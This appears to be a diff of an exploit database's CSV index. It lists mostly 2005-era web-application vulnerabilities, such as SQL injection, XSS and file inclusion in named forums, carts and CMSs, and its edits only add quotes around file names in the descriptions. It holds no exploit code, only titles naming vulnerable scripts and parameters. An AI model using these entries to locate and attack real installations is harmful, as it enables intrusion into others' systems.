+25475,platforms/php/webapps/25475.txt,"phpBB-Auction Module 1.0/1.2 - 'Auction_Offer.php' SQL Injection",2005-04-20,sNKenjoi,php,webapps,0 25476,platforms/asp/webapps/25476.txt,"DUportal Pro 3.4 - 'default.asp' Multiple SQL Injections",2005-04-20,Dcrab,asp,webapps,0 25477,platforms/asp/webapps/25477.txt,"DUportal Pro 3.4 - 'search.asp?iChannel' SQL Injection",2005-04-20,Dcrab,asp,webapps,0 25478,platforms/asp/webapps/25478.txt,"DUportal Pro 3.4 - 'inc_vote.asp' Multiple SQL Injections",2005-04-20,Dcrab,asp,webapps,0 @@ -28308,7 +28309,7 @@ id,file,description,date,author,platform,type,port 25500,platforms/asp/webapps/25500.txt,"ASPNuke 0.80 - detail.asp SQL Injection",2005-04-22,Dcrab,asp,webapps,0 25501,platforms/asp/webapps/25501.txt,"ASPNuke 0.80 - profile.asp Cross-Site Scripting",2005-04-22,Dcrab,asp,webapps,0 25502,platforms/asp/webapps/25502.txt,"ASPNuke 0.80 - Select.asp Cross-Site Scripting",2005-04-22,Dcrab,asp,webapps,0 -25503,platforms/php/webapps/25503.txt,"WoltLab Burning Board 2.3.1 - thread.php Cross-Site Scripting",2005-04-22,deluxe89,php,webapps,0 +25503,platforms/php/webapps/25503.txt,"WoltLab Burning Board 2.3.1 - 'thread.php' Cross-Site Scripting",2005-04-22,deluxe89,php,webapps,0 25504,platforms/asp/webapps/25504.txt,"Black Knight Forum 4.0 - Member.asp SQL Injection",2005-04-23,Dcrab,asp,webapps,0 25505,platforms/asp/webapps/25505.txt,"Black Knight Forum 4.0 - forum.asp SQL Injection",2005-04-23,Dcrab,asp,webapps,0 25506,platforms/asp/webapps/25506.txt,"CartWIZ 1.10 - AddToCart.asp SQL Injection",2005-04-23,Dcrab,asp,webapps,0 @@ -28328,9 +28329,9 @@ id,file,description,date,author,platform,type,port 25520,platforms/asp/webapps/25520.txt,"CartWIZ 1.10 - 'login.asp' Message Argument Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 25521,platforms/asp/webapps/25521.txt,"CartWIZ 1.10 - searchresults.asp SKU Argument Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 25522,platforms/asp/webapps/25522.txt,"CartWIZ 1.10 - searchresults.asp Name Argument Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 -25523,platforms/php/webapps/25523.txt,"phpBB 2.0.x - profile.php Cross-Site Scripting",2005-04-23,HaCkZaTaN,php,webapps,0 -25524,platforms/php/webapps/25524.txt,"phpBB 2.0.x - viewtopic.php Cross-Site Scripting",2005-04-23,HaCkZaTaN,php,webapps,0 -25528,platforms/php/webapps/25528.txt,"WoltLab Burning Board 2.3.1 - PMS.php Cross-Site Scripting",2005-04-25,deluxe89,php,webapps,0 +25523,platforms/php/webapps/25523.txt,"phpBB 2.0.x - 'profile.php' Cross-Site Scripting",2005-04-23,HaCkZaTaN,php,webapps,0 +25524,platforms/php/webapps/25524.txt,"phpBB 2.0.x - 'viewtopic.php' Cross-Site Scripting",2005-04-23,HaCkZaTaN,php,webapps,0 +25528,platforms/php/webapps/25528.txt,"WoltLab Burning Board 2.3.1 - 'PMS.php' Cross-Site Scripting",2005-04-25,deluxe89,php,webapps,0 25529,platforms/asp/webapps/25529.txt,"StorePortal 2.63 - 'default.asp' Multiple SQL Injections",2005-04-25,Dcrab,asp,webapps,0 25530,platforms/asp/webapps/25530.txt,"OneWorldStore - IDOrder Information Disclosure",2005-04-25,Lostmon,asp,webapps,0 25531,platforms/php/webapps/25531.html,"PHPMyVisites 1.3 - 'Set_Lang' File Inclusion",2005-04-26,"Max Cerny",php,webapps,0 @@ -28414,19 +28415,19 @@ id,file,description,date,author,platform,type,port 25637,platforms/php/webapps/25637.txt,"CodeThatShoppingCart 1.3.1 - 'catalog.php?id' Cross-Site Scripting",2005-05-09,Lostmon,php,webapps,0 25638,platforms/php/webapps/25638.txt,"CodeThatShoppingCart 1.3.1 - 'catalog.php?id' SQL Injection",2005-05-09,Lostmon,php,webapps,0 25639,platforms/php/webapps/25639.txt,"PWSPHP 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-05-09,"SecuBox fRoGGz",php,webapps,0 -25640,platforms/php/webapps/25640.txt,"PWSPHP 1.1/1.2 - Profil.php SQL Injection",2005-05-09,"SecuBox fRoGGz",php,webapps,0 -25641,platforms/php/webapps/25641.txt,"WowBB 1.6 - View_User.php SQL Injection",2005-05-10,Megasky,php,webapps,0 +25640,platforms/php/webapps/25640.txt,"PWSPHP 1.1/1.2 - 'Profil.php' SQL Injection",2005-05-09,"SecuBox fRoGGz",php,webapps,0 +25641,platforms/php/webapps/25641.txt,"WowBB 1.6 - 'View_User.php' SQL Injection",2005-05-10,Megasky,php,webapps,0 25642,platforms/php/webapps/25642.txt,"NukeET 3.0/3.1 - Base64 Codigo Variable Cross-Site Scripting",2005-05-10,"Suko and Lostmon",php,webapps,0 -25644,platforms/php/webapps/25644.txt,"e107 Website System 0.617 - Request.php Directory Traversal",2005-05-10,Heintz,php,webapps,0 -25645,platforms/php/webapps/25645.txt,"e107 Website System 0.617 - Forum_viewforum.php SQL Injection",2005-05-10,Heintz,php,webapps,0 +25644,platforms/php/webapps/25644.txt,"e107 Website System 0.617 - 'Request.php' Directory Traversal",2005-05-10,Heintz,php,webapps,0 +25645,platforms/php/webapps/25645.txt,"e107 Website System 0.617 - 'Forum_viewforum.php' SQL Injection",2005-05-10,Heintz,php,webapps,0 25649,platforms/cgi/webapps/25649.txt,"showoff! digital media software 1.5.4 - Multiple Vulnerabilities",2011-05-11,dr_insane,cgi,webapps,0 25650,platforms/php/webapps/25650.txt,"Open Solution Quick.Cart 0.3 - 'index.php' Cross-Site Scripting",2005-05-11,Lostmon,php,webapps,0 25651,platforms/asp/webapps/25651.txt,"Maxwebportal 1.3x - 'post.asp' Multiple Cross-Site Scripting Vulnerabilities",2005-05-11,Zinho,asp,webapps,0 -25653,platforms/php/webapps/25653.txt,"DirectTopics 2 - topic.php SQL Injection",2005-05-12,"Morinex Eneco",php,webapps,0 -25654,platforms/php/webapps/25654.txt,"Ultimate PHP Board 1.8/1.9 - viewforum.php Cross-Site Scripting",2005-05-13,"Morinex Eneco",php,webapps,0 -25655,platforms/php/webapps/25655.txt,"Ultimate PHP Board 1.8/1.9 - viewforum.php SQL Injection",2005-05-13,"Morinex Eneco",php,webapps,0 -25656,platforms/php/webapps/25656.txt,"OpenBB 1.0.8 - Read.php SQL Injection",2005-05-13,Megasky,php,webapps,0 -25657,platforms/php/webapps/25657.txt,"OpenBB 1.0.8 - member.php Cross-Site Scripting",2005-05-13,Megasky,php,webapps,0 +25653,platforms/php/webapps/25653.txt,"DirectTopics 2 - 'topic.php' SQL Injection",2005-05-12,"Morinex Eneco",php,webapps,0 +25654,platforms/php/webapps/25654.txt,"Ultimate PHP Board 1.8/1.9 - 'viewforum.php' Cross-Site Scripting",2005-05-13,"Morinex Eneco",php,webapps,0 +25655,platforms/php/webapps/25655.txt,"Ultimate PHP Board 1.8/1.9 - 'viewforum.php' SQL Injection",2005-05-13,"Morinex Eneco",php,webapps,0 +25656,platforms/php/webapps/25656.txt,"OpenBB 1.0.8 - 'Read.php' SQL Injection",2005-05-13,Megasky,php,webapps,0 +25657,platforms/php/webapps/25657.txt,"OpenBB 1.0.8 - 'member.php' Cross-Site Scripting",2005-05-13,Megasky,php,webapps,0 25659,platforms/php/webapps/25659.txt,"PHPHeaven PHPMyChat 0.14.5 - Start-Page.CSS.php3 Cross-Site Scripting",2005-05-13,Megasky,php,webapps,0 25660,platforms/php/webapps/25660.txt,"PHPHeaven PHPMyChat 0.14.5 - Style.CSS.php3 Cross-Site Scripting",2005-05-13,Megasky,php,webapps,0 25661,platforms/asp/webapps/25661.txt,"Keyvan1 ImageGallery - Database Download",2005-05-01,"g0rellazz G0r",asp,webapps,0 @@ -28512,12 +28513,12 @@ id,file,description,date,author,platform,type,port 25819,platforms/php/webapps/25819.txt,"FusionBB 0.x - Multiple Input Validation Vulnerabilities",2005-06-13,"James Bercegay",php,webapps,0 33411,platforms/php/webapps/33411.txt,"iSupport 1.8 - 'ticket_function.php' Multiple Cross-Site Scripting Vulnerabilities",2009-12-16,"Stink and Essandre",php,webapps,0 33412,platforms/php/webapps/33412.txt,"iSupport 1.8 - 'index.php' which Parameter Cross-Site Scripting",2009-12-16,"Stink and Essandre",php,webapps,0 -33413,platforms/php/webapps/33413.txt,"Pluxml-Blog 4.2 - 'core/admin/auth.php' Cross-Site Scripting",2009-12-17,Metropolis,php,webapps,0 +33413,platforms/php/webapps/33413.txt,"Pluxml-Blog 4.2 - '/core/admin/auth.php' Cross-Site Scripting",2009-12-17,Metropolis,php,webapps,0 33416,platforms/php/webapps/33416.txt,"QuiXplorer 2.x - 'lang' Local File Inclusion",2009-12-17,"Juan Galiana Lara",php,webapps,0 33417,platforms/php/webapps/33417.txt,"cPanel 11.x - 'fileop' Multiple Cross-Site Scripting Vulnerabilities",2009-12-17,RENO,php,webapps,0 33418,platforms/php/webapps/33418.txt,"Joomla! Component com_joomportfolio - 'secid' SQL Injection",2009-12-17,"Fl0riX and Snakespc",php,webapps,0 -33419,platforms/php/webapps/33419.txt,"F3Site 2009 - 'mod/poll.php?GLOBALS[nlang]' Traversal Local File Inclusion",2009-12-18,cr4wl3r,php,webapps,0 -33420,platforms/php/webapps/33420.txt,"F3Site 2009 - 'mod/new.php' GLOBALS[nlang] Parameter Traversal Local File Inclusion",2009-12-18,cr4wl3r,php,webapps,0 +33419,platforms/php/webapps/33419.txt,"F3Site 2009 - '/mod/poll.php?GLOBALS[nlang]' Traversal Local File Inclusion",2009-12-18,cr4wl3r,php,webapps,0 +33420,platforms/php/webapps/33420.txt,"F3Site 2009 - '/mod/new.php' GLOBALS[nlang] Parameter Traversal Local File Inclusion",2009-12-18,cr4wl3r,php,webapps,0 40390,platforms/php/webapps/40390.php,"BuilderEngine 3.5.0 - Arbitrary File Upload",2016-09-19,metanubix,php,webapps,80 33421,platforms/php/webapps/33421.txt,"Ampache 3.4.3 - 'login.php' Multiple SQL Injections",2009-12-18,R3d-D3V!L,php,webapps,0 33422,platforms/php/webapps/33422.txt,"JBC Explorer 7.20 - 'arbre.php' Cross-Site Scripting",2009-12-20,Metropolis,php,webapps,0 @@ -28535,8 +28536,8 @@ id,file,description,date,author,platform,type,port 25788,platforms/php/webapps/25788.txt,"Popper Webmail 1.41 - 'ChildWindow.Inc.php' Remote File Inclusion",2005-06-03,"Leon Juranic",php,webapps,0 25790,platforms/asp/webapps/25790.txt,"WWWeb Concepts Events System 1.0 - 'login.asp' SQL Injection",2005-06-06,Romty,asp,webapps,0 25792,platforms/php/webapps/25792.txt,"YaPiG 0.9x - Local/Remote File Inclusion",2005-06-06,anonymous,php,webapps,0 -25793,platforms/php/webapps/25793.txt,"YaPiG 0.9x - view.php Cross-Site Scripting",2005-06-06,anonymous,php,webapps,0 -25794,platforms/php/webapps/25794.txt,"YaPiG 0.9x - upload.php Directory Traversal",2005-06-06,anonymous,php,webapps,0 +25793,platforms/php/webapps/25793.txt,"YaPiG 0.9x - 'view.php' Cross-Site Scripting",2005-06-06,anonymous,php,webapps,0 +25794,platforms/php/webapps/25794.txt,"YaPiG 0.9x - 'upload.php' Directory Traversal",2005-06-06,anonymous,php,webapps,0 25795,platforms/asp/webapps/25795.txt,"Early Impact ProductCart 2.6/2.7 - 'viewPrd.asp?idcategory' SQL Injection",2005-06-06,"Dedi Dwianto",asp,webapps,0 25796,platforms/asp/webapps/25796.txt,"Early Impact ProductCart 2.6/2.7 - 'editCategories.asp?lid' SQL Injection",2005-06-06,"Dedi Dwianto",asp,webapps,0 25797,platforms/asp/webapps/25797.txt,"Early Impact ProductCart 2.6/2.7 - 'modCustomCardPaymentOpt.asp?idc' SQL Injection",2005-06-06,"Dedi Dwianto",asp,webapps,0 @@ -28559,7 +28560,7 @@ id,file,description,date,author,platform,type,port 25828,platforms/php/webapps/25828.txt,"ATutor 1.4.3 - 'content.php' cid Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 25829,platforms/php/webapps/25829.txt,"ATutor 1.4.3 - 'send_message.php' l Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 25830,platforms/php/webapps/25830.txt,"ATutor 1.4.3 - 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-16,Lostmon,php,webapps,0 -25831,platforms/php/webapps/25831.txt,"ATutor 1.4.3 - 'inbox/index.php' view Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 +25831,platforms/php/webapps/25831.txt,"ATutor 1.4.3 - '/inbox/index.php' view Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 25832,platforms/php/webapps/25832.txt,"ATutor 1.4.3 - 'tile.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-16,Lostmon,php,webapps,0 25833,platforms/php/webapps/25833.txt,"ATutor 1.4.3 - 'subscribe_forum.php' us Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 25834,platforms/php/webapps/25834.txt,"ATutor 1.4.3 - 'Directory.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-16,Lostmon,php,webapps,0 @@ -28598,7 +28599,7 @@ id,file,description,date,author,platform,type,port 25872,platforms/asp/webapps/25872.txt,"DUware DUclassmate 1.x - 'default.asp?iState' SQL Injection",2005-06-01,"Dedi Dwianto",asp,webapps,0 25873,platforms/asp/webapps/25873.txt,"DUware DUclassmate 1.x - 'edit.asp?iPro' SQL Injection",2005-06-01,"Dedi Dwianto",asp,webapps,0 25874,platforms/asp/webapps/25874.txt,"Ipswitch WhatsUp Professional 2005 SP1 - 'login.asp' SQL Injection",2005-06-22,anonymous,asp,webapps,0 -25875,platforms/php/webapps/25875.txt,"Whois.Cart 2.2.x - profile.php Cross-Site Scripting",2005-06-23,"Elzar Stuffenbach",php,webapps,0 +25875,platforms/php/webapps/25875.txt,"Whois.Cart 2.2.x - 'profile.php' Cross-Site Scripting",2005-06-23,"Elzar Stuffenbach",php,webapps,0 25876,platforms/php/webapps/25876.txt,"CarLine Forum Russian Board 4.2 - 'menu_footer.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-23,1dt.w0lf,php,webapps,0 25877,platforms/php/webapps/25877.txt,"CarLine Forum Russian Board 4.2 - IMG Tag Cross-Site Scripting",2005-06-23,1dt.w0lf,php,webapps,0 25878,platforms/php/webapps/25878.txt,"CarLine Forum Russian Board 4.2 - 'menu_header.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-23,1dt.w0lf,php,webapps,0 @@ -28637,7 +28638,7 @@ id,file,description,date,author,platform,type,port 25915,platforms/php/webapps/25915.py,"PHD Help Desk 2.12 - SQL Injection",2013-06-03,drone,php,webapps,0 25927,platforms/php/webapps/25927.pl,"RaXnet Cacti 0.5/0.6.x/0.8.x - Graph_Image.php Remote Command Execution Variant",2005-07-01,"Alberto Trivero",php,webapps,0 25918,platforms/cgi/webapps/25918.txt,"CGI-Club imTRBBS 1.0 - Remote Command Execution",2005-06-29,blahplok,cgi,webapps,0 -25919,platforms/php/webapps/25919.txt,"Phorum 5.0.11 - Read.php SQL Injection",2004-10-24,"Positive Technologies",php,webapps,0 +25919,platforms/php/webapps/25919.txt,"Phorum 5.0.11 - 'Read.php' SQL Injection",2004-10-24,"Positive Technologies",php,webapps,0 25920,platforms/cgi/webapps/25920.pl,"Community Link Pro - login.cgi File Parameter Remote Command Execution",2005-06-29,spher3,cgi,webapps,0 25922,platforms/asp/webapps/25922.txt,"CyberStrong EShop 4.2 - 20review.asp SQL Injection",2005-06-30,aresu@bosen.net,asp,webapps,0 25923,platforms/asp/webapps/25923.txt,"CyberStrong eShop 4.2 - 10expand.asp SQL Injection",2005-06-30,aresu@bosen.net,asp,webapps,0 @@ -28667,7 +28668,7 @@ id,file,description,date,author,platform,type,port 25955,platforms/php/webapps/25955.txt,"PhotoGal 1.0/1.5 - News_File Remote File Inclusion",2005-07-07,"skdaemon porra",php,webapps,0 25956,platforms/asp/webapps/25956.txt,"Comersus Open Technologies Comersus Cart 6.0.41 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-07,"Diabolic Crab",asp,webapps,0 25957,platforms/php/webapps/25957.txt,"PunBB 1.x - 'profile.php' User Profile Edit Module SQL Injection",2005-07-08,"Stefan Esser",php,webapps,0 -25958,platforms/php/webapps/25958.txt,"ID Team ID Board 1.1.3 - SQL.CLS.php SQL Injection",2005-07-10,Defa,php,webapps,0 +25958,platforms/php/webapps/25958.txt,"ID Team ID Board 1.1.3 - 'SQL.CLS.php' SQL Injection",2005-07-10,Defa,php,webapps,0 25959,platforms/php/webapps/25959.txt,"Spid 1.3 - lang_path File Inclusion",2005-07-11,"skdaemon porra",php,webapps,0 25960,platforms/php/webapps/25960.txt,"PPA 0.5.6 - 'ppa_root_path' File Inclusion",2005-07-10,"skdaemon porra",php,webapps,0 25963,platforms/asp/webapps/25963.txt,"Dragonfly Commerce 1.0 - Multiple SQL Injections",2005-07-12,"Diabolic Crab",asp,webapps,0 @@ -28675,7 +28676,7 @@ id,file,description,date,author,platform,type,port 25965,platforms/asp/webapps/25965.txt,"DVBBS 7.1 - ShowErr.asp Cross-Site Scripting",2005-07-12,rUnViRuS,asp,webapps,0 25968,platforms/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - File Disclosure",2013-06-05,"Todor Donev",hardware,webapps,0 25969,platforms/hardware/webapps/25969.txt,"NETGEAR WPN824v3 - Unauthorized Config Download",2013-06-05,"Jens Regel",hardware,webapps,0 -25971,platforms/php/webapps/25971.txt,"Cuppa CMS - 'alertConfigField.php' Local/Remote File Inclusion",2013-06-05,"CWH Underground",php,webapps,0 +25971,platforms/php/webapps/25971.txt,"Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion",2013-06-05,"CWH Underground",php,webapps,0 25973,platforms/php/webapps/25973.txt,"Ruubikcms 1.1.1 - 'tinybrowser.php?folder' Directory Traversal",2013-06-05,expl0i13r,php,webapps,0 25976,platforms/hardware/webapps/25976.txt,"DS3 Authentication Server - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",hardware,webapps,0 25977,platforms/jsp/webapps/25977.txt,"Imperva SecureSphere Operations Manager 9.0.0.5 - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",jsp,webapps,0 @@ -28689,12 +28690,12 @@ id,file,description,date,author,platform,type,port 25994,platforms/php/webapps/25994.txt,"osCommerce 2.2 - update.php Information Disclosure",2005-07-18,"Andrew Hunter",php,webapps,0 25995,platforms/php/webapps/25995.txt,"e107 Website System 0.6 - Nested BBCode URL Tag Script Injection",2005-07-18,"Nick Griffin",php,webapps,0 25996,platforms/php/webapps/25996.txt,"Ruubikcms 1.1.1 - Persistent Cross-Site Scripting",2013-06-07,expl0i13r,php,webapps,0 -25997,platforms/php/webapps/25997.txt,"tForum b0.9 - member.php Cross-Site Scripting",2005-07-18,wannacut,php,webapps,0 +25997,platforms/php/webapps/25997.txt,"tForum b0.9 - 'member.php' Cross-Site Scripting",2005-07-18,wannacut,php,webapps,0 25998,platforms/hardware/webapps/25998.txt,"Asus RT56U 3.0.0.4.360 - Remote Command Injection",2013-06-07,drone,hardware,webapps,0 26001,platforms/java/webapps/26001.txt,"Novell Groupwise 6.5 Webaccess - HTML Injection",2005-07-15,"Francisco Amato",java,webapps,0 26007,platforms/php/webapps/26007.txt,"PHP Ticket System Beta 1 - Cross-Site Request Forgery",2013-06-07,"Pablo Ribeiro",php,webapps,0 26293,platforms/php/webapps/26293.txt,"jPORTAL 2.2.1/2.3.1 - 'download.php' SQL Injection",2005-08-21,krasza,php,webapps,0 -26294,platforms/php/webapps/26294.txt,"PHPMyFAQ 1.5.1 - Password.php SQL Injection",2005-08-23,retrogod@aliceposta.it,php,webapps,0 +26294,platforms/php/webapps/26294.txt,"PHPMyFAQ 1.5.1 - 'Password.php' SQL Injection",2005-08-23,retrogod@aliceposta.it,php,webapps,0 26295,platforms/php/webapps/26295.txt,"PHPMyFAQ 1.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-23,rgod,php,webapps,0 26296,platforms/php/webapps/26296.txt,"PHPMyFAQ 1.5.1 - Local File Inclusion",2005-08-23,rgod,php,webapps,0 26009,platforms/php/webapps/26009.txt,"AfterLogic WebMail Lite PHP 7.0.1 - Cross-Site Request Forgery",2013-06-07,"Pablo Ribeiro",php,webapps,0 @@ -28714,10 +28715,10 @@ id,file,description,date,author,platform,type,port 26028,platforms/php/webapps/26028.txt,"Netquery 3.1 - 'nqports.php?step' Cross-Site Scripting",2005-07-25,rgod,php,webapps,0 26029,platforms/php/webapps/26029.txt,"Netquery 3.1 - 'nqports2.php' Multiple Cross-Site Scripting Vulnerabilities",2005-07-25,rgod,php,webapps,0 26030,platforms/php/webapps/26030.txt,"Netquery 3.1 - 'portlist.php?portnum' Cross-Site Scripting",2005-07-25,rgod,php,webapps,0 -26031,platforms/php/webapps/26031.txt,"VBZoom Forum 1.11 - show.php SQL Injection",2005-07-26,abducter_minds@yahoo.com,php,webapps,0 +26031,platforms/php/webapps/26031.txt,"VBZoom Forum 1.11 - 'show.php' SQL Injection",2005-07-26,abducter_minds@yahoo.com,php,webapps,0 26033,platforms/asp/webapps/26033.txt,"CartWIZ 1.10/1.20 - viewcart.asp Cross-Site Scripting",2005-07-26,Zinho,asp,webapps,0 -26034,platforms/php/webapps/26034.txt,"NETonE PHPBook 1.4.6 - Guestbook.php Cross-Site Scripting",2005-07-26,rgod,php,webapps,0 -26036,platforms/php/webapps/26036.txt,"PNG Counter 1.0 - Demo.php Cross-Site Scripting",2005-07-26,ArCaX-ATH,php,webapps,0 +26034,platforms/php/webapps/26034.txt,"NETonE PHPBook 1.4.6 - 'Guestbook.php' Cross-Site Scripting",2005-07-26,rgod,php,webapps,0 +26036,platforms/php/webapps/26036.txt,"PNG Counter 1.0 - 'Demo.php' Cross-Site Scripting",2005-07-26,ArCaX-ATH,php,webapps,0 26037,platforms/php/webapps/26037.txt,"Clever Copy 2.0 - 'results.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0 26038,platforms/php/webapps/26038.txt,"Clever Copy 2.0 - 'categorysearch.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0 26039,platforms/php/webapps/26039.txt,"BMForum 3.0 - 'topic.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0 @@ -28734,7 +28735,7 @@ id,file,description,date,author,platform,type,port 26051,platforms/php/webapps/26051.txt,"Kayako LiveResponse 2.0 - 'index.php?Username' Cross-Site Scripting",2005-07-30,"James Bercegay",php,webapps,0 26052,platforms/php/webapps/26052.txt,"Kayako LiveResponse 2.0 - 'index.php' Calendar Feature Multiple SQL Injections",2005-07-30,"James Bercegay",php,webapps,0 26053,platforms/php/webapps/26053.txt,"PluggedOut CMS 0.4.8 - 'contenttypeid' SQL Injection",2005-09-30,FalconDeOro,php,webapps,0 -26054,platforms/php/webapps/26054.txt,"PluggedOut CMS 0.4.8 - admin.php Cross-Site Scripting",2005-09-30,FalconDeOro,php,webapps,0 +26054,platforms/php/webapps/26054.txt,"PluggedOut CMS 0.4.8 - 'admin.php' Cross-Site Scripting",2005-09-30,FalconDeOro,php,webapps,0 26055,platforms/php/webapps/26055.txt,"Ragnarok Online Control Panel 4.3.4 a - Authentication Bypass",2005-07-30,VaLiuS,php,webapps,0 26056,platforms/php/webapps/26056.txt,"MySQL AB Eventum 1.x - 'view.php?id' Cross-Site Scripting",2005-08-01,"James Bercegay",php,webapps,0 26057,platforms/php/webapps/26057.txt,"MySQL AB Eventum 1.x - 'list.php?release' Cross-Site Scripting",2005-08-01,"James Bercegay",php,webapps,0 @@ -28742,9 +28743,9 @@ id,file,description,date,author,platform,type,port 26059,platforms/php/webapps/26059.txt,"PHPFreeNews 1.x - Multiple Cross-Site Scripting Vulnerabilities",2005-08-01,rgod,php,webapps,0 26060,platforms/cfm/webapps/26060.txt,"AderSoftware CFBB 1.1 - index.cfm Cross-Site Scripting",2005-08-01,rUnViRuS,cfm,webapps,0 26061,platforms/php/webapps/26061.txt,"PHPFreeNews 1.x - Admin Login SQL Injection",2005-08-01,rgod,php,webapps,0 -26062,platforms/php/webapps/26062.txt,"OpenBook 1.2.2 - admin.php SQL Injection",2005-08-01,SVT,php,webapps,0 -26063,platforms/php/webapps/26063.txt,"Naxtor Shopping Cart 1.0 - Lost_password.php Cross-Site Scripting",2005-08-02,"John Cobb",php,webapps,0 -26064,platforms/php/webapps/26064.txt,"Naxtor Shopping Cart 1.0 - Shop_Display_Products.php SQL Injection",2005-08-02,"John Cobb",php,webapps,0 +26062,platforms/php/webapps/26062.txt,"OpenBook 1.2.2 - 'admin.php' SQL Injection",2005-08-01,SVT,php,webapps,0 +26063,platforms/php/webapps/26063.txt,"Naxtor Shopping Cart 1.0 - 'Lost_password.php' Cross-Site Scripting",2005-08-02,"John Cobb",php,webapps,0 +26064,platforms/php/webapps/26064.txt,"Naxtor Shopping Cart 1.0 - 'Shop_Display_Products.php' SQL Injection",2005-08-02,"John Cobb",php,webapps,0 26065,platforms/cfm/webapps/26065.txt,"Fusebox 4.1 - index.cfm Cross-Site Scripting",2005-08-03,N.N.P,cfm,webapps,0 26066,platforms/cgi/webapps/26066.txt,"Karrigell 1.x/2.0/2.1 - '.KS' File Arbitrary Python Command Execution",2005-07-31,"Radovan Garabík",cgi,webapps,0 26067,platforms/php/webapps/26067.txt,"Web Content Management - 'validsession.php?strRootpath' Cross-Site Scripting",2005-08-03,rgod,php,webapps,0 @@ -28758,7 +28759,7 @@ id,file,description,date,author,platform,type,port 26297,platforms/php/webapps/26297.txt,"PHPMyFAQ 1.5.1 - Logs Unauthorized Access",2005-08-23,rgod,php,webapps,0 26298,platforms/php/webapps/26298.txt,"CMS Made Simple 0.10 - 'index.php' Cross-Site Scripting",2005-09-26,X1ngBox,php,webapps,0 26079,platforms/php/webapps/26079.txt,"Comdev eCommerce 3.0 - 'config.php' Remote File Inclusion",2005-08-05,anonymous,php,webapps,0 -26080,platforms/php/webapps/26080.txt,"Comdev eCommerce 3.0 - WCE.download.php Directory Traversal",2005-08-05,anonymous,php,webapps,0 +26080,platforms/php/webapps/26080.txt,"Comdev eCommerce 3.0 - 'WCE.download.php' Directory Traversal",2005-08-05,anonymous,php,webapps,0 26081,platforms/php/webapps/26081.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'dwt_editor.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-05,Lostmon,php,webapps,0 26082,platforms/php/webapps/26082.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'jax_newsletter.php' language Parameter Cross-Site Scripting",2005-08-05,Lostmon,php,webapps,0 26083,platforms/php/webapps/26083.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'sign_in.php?language' Cross-Site Scripting",2005-08-05,Lostmon,php,webapps,0 @@ -28790,7 +28791,7 @@ id,file,description,date,author,platform,type,port 26112,platforms/php/webapps/26112.txt,"PHP Lite Calendar Express 2.2 - 'login.php' cid Parameter SQL Injection",2005-08-08,almaster,php,webapps,0 26113,platforms/php/webapps/26113.txt,"PHP Lite Calendar Express 2.2 - 'auth.php?cid' SQL Injection",2005-08-08,almaster,php,webapps,0 26114,platforms/php/webapps/26114.txt,"PHP Lite Calendar Express 2.2 - 'Subscribe.php?cid' SQL Injection",2005-08-08,almaster,php,webapps,0 -26115,platforms/php/webapps/26115.txt,"Calendar Express 2.2 - search.php Cross-Site Scripting",2005-08-08,almaster,php,webapps,0 +26115,platforms/php/webapps/26115.txt,"Calendar Express 2.2 - 'search.php' Cross-Site Scripting",2005-08-08,almaster,php,webapps,0 26116,platforms/php/webapps/26116.txt,"Chipmunk CMS 1.3 - Fontcolor Cross-Site Scripting",2005-08-08,rgod,php,webapps,0 26117,platforms/php/webapps/26117.txt,"FunkBoard 0.66 - 'editpost.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-08,rgod,php,webapps,0 26118,platforms/php/webapps/26118.txt,"FunkBoard 0.66 - 'prefs.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-08,rgod,php,webapps,0 @@ -28834,30 +28835,30 @@ id,file,description,date,author,platform,type,port 26171,platforms/php/webapps/26171.php,"PHPOutsourcing Zorum 3.5 - Prod.php Arbitrary Command Execution",2005-08-18,rgod,php,webapps,0 26172,platforms/php/webapps/26172.txt,"Mantis 0.x/1.0 - Multiple Input Validation Vulnerabilities",2005-08-19,anonymous,php,webapps,0 26174,platforms/hardware/webapps/26174.txt,"Airlive IP Cameras - Multiple Vulnerabilities",2013-06-13,"Sánchez_ Lopez_ Castillo",hardware,webapps,0 -26176,platforms/php/webapps/26176.txt,"Woltlab Burning Board 2.x - ModCP.php SQL Injection",2005-08-20,[R],php,webapps,0 +26176,platforms/php/webapps/26176.txt,"Woltlab Burning Board 2.x - 'ModCP.php' SQL Injection",2005-08-20,[R],php,webapps,0 26177,platforms/php/webapps/26177.txt,"Land Down Under 800/801 - 'links.php?w' SQL Injection",2005-08-20,bl2k,php,webapps,0 26178,platforms/php/webapps/26178.txt,"Land Down Under 800/801 - 'journal.php?m' SQL Injection",2005-08-20,bl2k,php,webapps,0 26179,platforms/php/webapps/26179.txt,"Land Down Under 800/801 - 'list.php' Multiple SQL Injections",2005-08-20,bl2k,php,webapps,0 26180,platforms/php/webapps/26180.txt,"Land Down Under 800/801 - 'forums.php' Multiple SQL Injections",2005-08-20,bl2k,php,webapps,0 26181,platforms/php/webapps/26181.txt,"Land Down Under 800 - 'journal.php?w' Cross-Site Scripting",2005-08-20,bl2k,php,webapps,0 